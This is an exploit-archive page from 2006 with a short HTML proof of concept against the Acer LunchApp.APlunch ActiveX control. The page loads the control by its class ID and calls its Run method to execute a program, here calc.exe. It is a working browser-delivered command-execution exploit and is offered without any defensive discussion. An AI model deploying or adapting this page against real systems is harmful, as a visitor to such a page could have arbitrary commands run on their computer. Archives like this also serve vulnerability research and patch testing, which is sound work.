[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit
# Published : 2006-11-30
# Author : Tan Chew Keong
# Previous Title : 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
# Next Title : VUPlayer <= 2.44 (M3U UNC Name) Buffer Overflow Exploit (meta)
<!--
Author: Tan Chew Keong
Site: http://vuln.sg/
Acer Notebook LunchApp.APlunch ActiveX Control Command Execution Exploit
-->
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\windows\system32\calc.exe", "");
</script>
</html>
</body>
# www.Syue.com [2006-11-30]